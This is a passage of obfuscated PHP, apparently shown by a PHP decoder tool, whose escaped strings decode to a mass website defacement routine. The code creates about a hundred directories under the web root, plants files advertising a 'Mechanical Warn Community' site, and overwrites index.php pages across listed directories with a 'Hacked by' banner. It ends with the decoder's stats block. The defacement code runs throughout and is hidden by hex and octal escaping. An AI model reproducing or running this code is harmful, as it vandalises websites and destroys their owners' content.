				$var = fopen($mk . "\57\115\x65\143\x68\x61\x6e\x69\x63\x61\x6c\40\x57\141\162\156\x20\x43\157\x6d\x6d\x75\156\x69\164\171\56\164\170\164", "\141\x2b"); 

				fwrite($var, "\x56\x69\x73\x69\x74\40\x55\x73\40\157\x6e\x20\150\x74\x74\x70\163\x3a\x2f\57\x6d\145\x63\150\x61\156\x69\x63\x61\x6c\167\141\x72\x6e\x2e\x63\157\155"); 
				chmod($mk . "\57\115\145\x63\150\141\x6e\x69\143\x61\x6c\40\x57\141\x72\x6e\x20\x43\x6f\x6d\x6d\x75\156\x69\x74\171\x2e\x74\170\164", 292); } } 
				echo "\x41\154\x6c\x20\x44\x69\162\40\122\x65\142\165\151\x6c\x64\40\46\x20\111\156\x6a\145\x63\164\145\x64\74\142\x72\76"; 

				for ($y = 0; $y <= 100; $y++) { $kc = $_SERVER["\104\x4f\x43\x55\x4d\x45\116\x54\x5f\x52\117\x4f\x54"]; 
					mkdir($kc . $y . "\115\145\143\150\141\x6e\151\143\x61\154\40\x57\141\x72\156\40\x43\157\155\155\165\x6e\151\164\x79", 256, true); 
				chmod($kc . $y . "\115\x65\143\150\141\x6e\x69\143\x61\x6c\40\127\141\x72\x6e\x20\103\x6f\x6d\x6d\x75\x6e\x69\x74\x79", 256); 
				$mk = $kc . $y . "\115\145\143\150\141\156\151\x63\141\154\x20\127\x61\x72\156\40\x43\157\x6d\x6d\x75\156\151\164\x79"; 
				$var = fopen($mk . "\x2f\x4d\x65\143\150\x61\156\151\x63\141\x6c\x20\x57\141\162\156\40\103\x6f\x6d\155\165\x6e\151\164\171\56\164\170\x74", "\x61\x2b"); 
				fwrite($var, "\126\151\x73\x69\164\x20\x55\163\x20\x6f\x6e\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\145\x63\150\x61\x6e\151\143\141\154\x77\x61\162\x6e\x2e\143\x6f\x6d"); 
				chmod($mk . "\x2f\115\x65\x63\x68\141\x6e\x69\x63\x61\154\x20\127\141\162\156\x20\103\157\155\x6d\165\156\151\164\x79\x2e\x74\x78\x74", 292); 
				$mn = "\151\156\x64\x65\170\x2e\x70\x68\160"; 
				$tx = "\110\x61\143\x6b\145\x64\40\x62\171\56\57\115\x68\x40\x6e\x6b\153\12\x4d\145\x63\150\141\x6e\x69\143\141\x6c\40\x57\141\x72\x6e\x20\103\x6f\x6d\155\165\156\151\164\x79\12"; 
				file_put_contents($mn, $tx, LOCK_EX); } 
				foreach ($dir as $dir_) { $path = "{$dir_}"; 
				$filename = "\x69\156\x64\x65\170\56\160\x68\x70"; 
				$location = "{$path}\x2f{$filename}"; 
				$isi = "\x48\141\143\153\145\144\40\142\171\x2e\57\x4d\150\100\x6e\153\x6b\12\115\145\143\x68\x61\x6e\151\143\x61\154\x20\x57\x61\x72\x6e\40\x43\157\155\x6d\x75\156\x69\x74\171\xa"; 
				file_put_contents($location, $isi); } 
				echo "\x41\x6c\x6c\40\111\156\144\145\x78\x20\x49\x6e\152\145\x63\x74\x65\x64"; } goto BWpTW; fgHug: ?>

Function Calls

None

Variables

None

Stats

MD5 18f0c8577aa94527a80eb2b9600a3f9f
Eval Count 0
Decode Time 65 ms